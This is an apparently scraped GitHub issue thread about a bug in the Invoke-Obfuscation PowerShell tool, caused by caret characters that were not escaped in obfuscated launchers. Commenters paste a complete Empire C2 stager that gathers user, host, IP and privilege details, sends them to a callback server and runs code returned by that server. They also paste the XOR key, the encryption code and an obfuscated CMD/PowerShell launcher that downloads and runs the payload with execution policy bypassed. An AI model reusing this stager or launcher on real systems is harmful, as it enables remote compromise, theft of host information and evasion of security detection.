Comments (6)
Did some more research into this. Looks like it traces back to an issue with String TOKEN obfuscation. Disabling the string TOKEN obfuscation while doing LAUNCHER obfuscation leads to all of the mentioned LAUNCHER obfuscation techniques to work.
If I am able to narrow this down to a more specific issue, I will report back.
from invoke-obfuscation.
I have not been able to reproduce this bug. Can you provide me with the encrypted Empire script that is eventually being invoked after the BXOR step?
from invoke-obfuscation.
Here's a fresh example for you.
Here is the pre-encryption Empire stager:
fUNcTion StART-NEGOtiaTe{param($s,$SK,$UA="lol")ADD-Type -asseMBlY SYsteM.SeCUrItY;Add-TyPE -AssEMBlY SYsTEM.CORe;$ErrorActionPreference = "SilentlyContinue";$e=[SySTem.TExt.EncodiNg]::ASCII;$AES=NEw-OBjEcT SYSteM.SECURITY.CryptOGrAphY.AeSCrYPToSERVicEPROVIDer;$IV = [bYte] 0..255 | GET-RANdOM -CoUnT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSp = New-OBjEct SyStEM.SECUrITY.CryPTogRapHY.CspPArAMETeRS;$csP.FLaGS = $Csp.FlAGs -bOR [SyStem.SEcuriTY.CrypTOGrApHy.CspPROViDERFLaGs]::UseMACHineKEyStoRE;$Rs = New-ObjeCt SYstEM.SEcurITy.CrYPTOgrAPHY.RSACRYPtoSerVIcePRoVidER -ARgUMEntList 2048,$CSp;$Rk=$rs.ToXMLStRing($FALSe);$r=1..16|FOrEach-ObJeCt{GeT-RaNdom -MAx 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$r] -JoIn '');$ib=$e.getbytEs($rk);$EB=$IV+$AES.CreATEEnCRyptOr().TRaNSFoRmFinAlBLoCk($ib,0,$ib.LeNGth);IF(-not $WC){$Wc=NEw-objEcT SYsTEM.nET.WEBCLIent;$WC.PRoxY = [SySTem.NET.WebReQUesT]::GeTSyStEmWeBPRoXY();$Wc.PROXy.CrEDENTiaLS = [SyStEm.NET.CrEDENtiAlCAcHE]::DEfAulTCREDeNtIAls;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$de=$e.GEtStRING($RS.DeCrYpT($RaW,$FAlsE));$EpoCh=$de[0..9] -join'';$Key=$de[10..$de.LenGTh] -jOIN '';$AES=New-Object SYSTEm.SEcurITY.CRYptoGRaphy.AESCrYPTOSeRvicePRovIDer;$IV = [BYtE] 0..255 | GeT-RandOM -CoUNt 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key); $AES.IV = $IV;$i=$S+'|'+[EnVironmENt]::USERDomaiNNAME+'|'+[EnVIrONMent]::USERNamE+'|'+[ENViroNMent]::MAchineNAmE;$P=(Gwmi WIN32_NeTWoRkADapTeRCoNFIgURatiON|WhERe{$_.IPAdDress}|SELeCt -EXPAND IPADDrEss);$ip = @{$TRUe=$P[0];$fALSE=$P}[$p.LEngth -Lt 6];If(!$Ip -or $ip.trIM() -EQ '') {$iP='0.0.0.0'};$i+="|$ip";$i+='|'+(Get-WMiObjEct WIN32_OPeRaTInGSYSTeM).NAMe.splIT('|')[0];if(([Environment]::UserName).ToLower() -eq "system"){$i+='|True'}else {$i += "|" +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")}$N=[SYstEm.DiaGNOStics.PROceSS]::GeTCuRrENtPROCESS();$i+='|'+$n.PROCeSSNAmE+'|'+$n.Id;$I += '|' + $PSVErsIonTABLe.PSVeRSiON.MAjOR;$iB2=$e.getbyTEs($i);$eb2=$IV+$AES.CrEaTeENCRyPtor().TRAnSFormFiNAlBlOck($iB2,0,$IB2.LEnGTh);$wc.Headers.Add("User-Agent",$UA);$raw=$wc.UploadData($s+"index.php","POST",$eb2);$AES=New-Object SySTeM.SEcURity.CrYPTogrAPhy.AEsCrYPtOSERViceProviDer;$AES.Mode="CBC";$IV = $raw[0..15];$AES.Key=$E.GetByTes($keY);$AES.IV = $IV;IEX $([SYSteM.TeXT.EncOdINg]::ASCII.GetStriNg( $($AES.CreaTEDEcRyPTOR().TRaNsfoRMFiNaLBLocK($RaW[16..$RAw.LEnGth],0,$RaW.LENGTH-16))));$AES=$nULL;$S2=$Null;$WC=$NUlL;$eb2=$nulL;$RAw=$nuLl;$IV=$NUlL;$WC=$nuLL;$i=$nulL;$iB2=$nULL;[GC]::COlLect();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -SessionKey $key -SessionID $ID -Epoch $epoch;} Start-Negotiate -s "http://192.168.1.79:8080/" -SK '^)tT]PZ8l&H-J\=/f@L(kox!hC?E$nRO' -UA $u;
The encrypted Empire stager is attached as a file. (Binary doesn't print well. It's attached as a .txt, because that is what Github supports. Keep in mind it is a binary file. Also keep in mind that this is technically a malicious payload (anyone reading, please don't run!), although it calls back to a 192.168.X, so you are safe.)
encrypted_stager.txt
The python code responsible for encryption:
def xor_encrypt(text,key):
"""
XOR the given text input with the specified key.
"""
return "".join(chr(ord(x)^ord(y))for x,y in zip(key*len(text),text))
encrypted = encryption.xor_encrypt(randomizedStager, key)
The randomizedStager
is the script shown above. The key (as can be found in the same script) is: ^)tT]PZ8l&H-J\=/f@L(kox!hC?E$nRO
Let me know if I can provide anything else useful for debugging!
from invoke-obfuscation.
The latest commit gives me the following error. This is after performing Launcher\CLIP++\57 :
C:\Windows\system32>CMd /c " echO\[SySTeM.NEt.SeRvICEPOIntMANAgEr]::ExPeCT100C
ONtINUe = 0;$WC=New-ObjEcT SyStEM.NET.WeBCLiENT;$u='Mozilla/5.0 (Windows NT 6.1;
WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HEaDerS.Add('User-Agent',$u);$WC.P
Roxy = [SyStEm.Net.WebReqUEsT]::DEfaUlTWeBPROxY;$Wc.PROxy.CrEDeNTials = [SYSTeM.
NEt.CrEdentIALCAche]::DeFAULTNeTWOrkCREDEnTIaLS;$K='^)tT]PZ8l^^^&H-J\=/f@L(kox!h
C?E$nRO';$I=0;[Char[]]$b=([chaR[]]($wC.DowNloadStrIng("http://192.168.1.79:8080/
index.asp")))^^^|%{$_-bXor$K[$i++%$k.LeNgTH]};IEX ($b-JOin'')| c:\winDoWS\SYsTem
32\CLiP&&CMd /cpoWERshELL -ST -exEcUTIoNP bYpasS -coMMa ^^^&( \"{2}{0}{1}\
" -f'yp','e',(\"{0}{1}\" -f 'Add','-T')) -Assembly ( \"{4}{3}{2}{1}{0}{6}{5}\"-f
'in','W','.','em',( \"{0}{1}\" -f'Sy','st' ),'ms',( \"{1}{0}\"-f'r','dows.Fo'))
; ${eXeCuTIoNCoNtEXT}.\"INVo`kEco`m`MA`ND\".\"iN`VOkESCRi`pt\"(( [WindOWs.fO
rMs.cLIPbOaRd]::( \"{2}{1}{0}\" -f'ExT','Ett','G').\"in`V`oke\"( ) ) ) ;
[Windows.Forms.Clipboard]::( \"{0}{2}{1}\" -f'Se','xt','tTe' ).\"iNv`OKE\"( '
' )"
Exception calling "InvokeScript" with "1" argument(s): "At line:2 char:5
+ :j=1&D§?cK+↨Mv-,P♀←‼+Q5BYQ
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:4 char:11
+ ♦]∟§♀BGu&o/*→R↑◄.c▬Jt747F♠uHF4l hVAlU♫►O☻_>Uh¶►Lq^(▬
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:4 char:55
+ ♦]∟§♀BGu&o/*→R↑◄.c▬Jt747F♠uHF4l hVAlU♫►O☻_>Uh¶►Lq^(▬
+ ~
Missing closing ')' in expression.
At line:5 char:10
+ N↓cbtV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣ r☺+z9JK+f u ⌂]K5rZ‼.}♫@"→ ...
+ ~
Unexpected token ')' in expression or statement.
At line:5 char:17
+ N↓cbtV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣ r☺+z9JK+f u ⌂]K5rZ‼.}♫@"→ ...
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:5 char:56
+ ... tV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣ r☺+z9JK+f u ⌂]K5rZ‼.}♫@"→M☺u ...
+ ~
Unexpected token '}' in expression or statement.
At line:6 char:2
+ G&4`Vl-xk5vz♫]+`v6M|z#↓ RO<↨]$f♣u1%<L:I♀W@↔g]h"x_9"+☼☻=<kBR;☻‼;wJ ...
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:9 char:49
+ j(6Fc^Y:♥'F1[G&YB9(▲S☻z98"c▬Wtxn↑lR.2,E1xxg↕:];H#l x868"B
+ ~
Missing closing ')' in expression.
At line:10 char:90
+ ... 9NDNqz1◄e8L!b={VfH%?S"<Q<<♠ha|S#^ hdN◄Mb*]wJJa↨27⌂rG→¶M2J‼ <n‼+RLv2: ...
+ ~
The '<' operator is reserved for future use.
At line:11 char:2
+ 2{W↔R;$h7Op9§D☼)U~♀*↓tnS1 w8s_VYYK{&4|&'t(.O$u,=x▬3 TifY
+ ~
Unexpected token '{' in expression or statement.
Not all parse errors were reported. Correct the reported errors and try
again."
At line:1 char:168
+ ... ows.Fo')) ; ${eXeCuTIoNCoNtEXT}."INVo`kEco`m`MA`ND"."iN`VOkESCRi`pt"( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CmdletInvocationException
from invoke-obfuscation.
The issue, which I have also experienced (at least one of the issues), is that Invoke-Obfuscation is not properly escaping caret (^) symbols in your powershell. You need to go through your powershell and any place you have a caret symbol, add two. so "[^s]" should become "[^^s]".
from invoke-obfuscation.
shellster, you are 100% correct. I was so focused on properly adding ^ for escaped characters that I missed that non-escape ^ characters were being removed. Thanks so much for this find. This issue should be resolved (in all affected launchers) in commit 3619e16
Please add any comments if you still encounter this issue in your use cases. Thanks again to both of you! Sorry this one took so long to track down.
from invoke-obfuscation.
Related Issues (20)
- This command exceeds the cmd.exe maximum length of 8190. ? HOT 2
- PowerShell/Pklotide.A Detected in Onedrive HOT 1
- Out-ObfuscatedTokenCommand HOT 6
- CommandNotFoundException occured when start Invoke-Obsfucation HOT 1
- Trojan:PowerShell/PSAttackTool.A HOT 1
- obfuscated output truncated HOT 1
- String Token obfuscation breaks multiline string variable substitution
- The cmdlet does not start HOT 3
- Malware in your code. HOT 8
- :)
- Missing Modules that are in psd1 HOT 1
- Thecommand too larger
- Obfuscated code broken
- Contains Virus HOT 4
- create automated script HOT 1
- Error When using Out-EncodedSpecialCharOnlyCommand but only the file and not when using Invoke-Obfuscation.ps1
- "Invoke-Obfuscation.ps1" file code error.
- Can this thing do the .apk obfuscation and what abotu the scoore.
- encoding will jam Get stuck
- the option AST/ALL/1 do nothing in comparison to the old version, why?
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from invoke-obfuscation.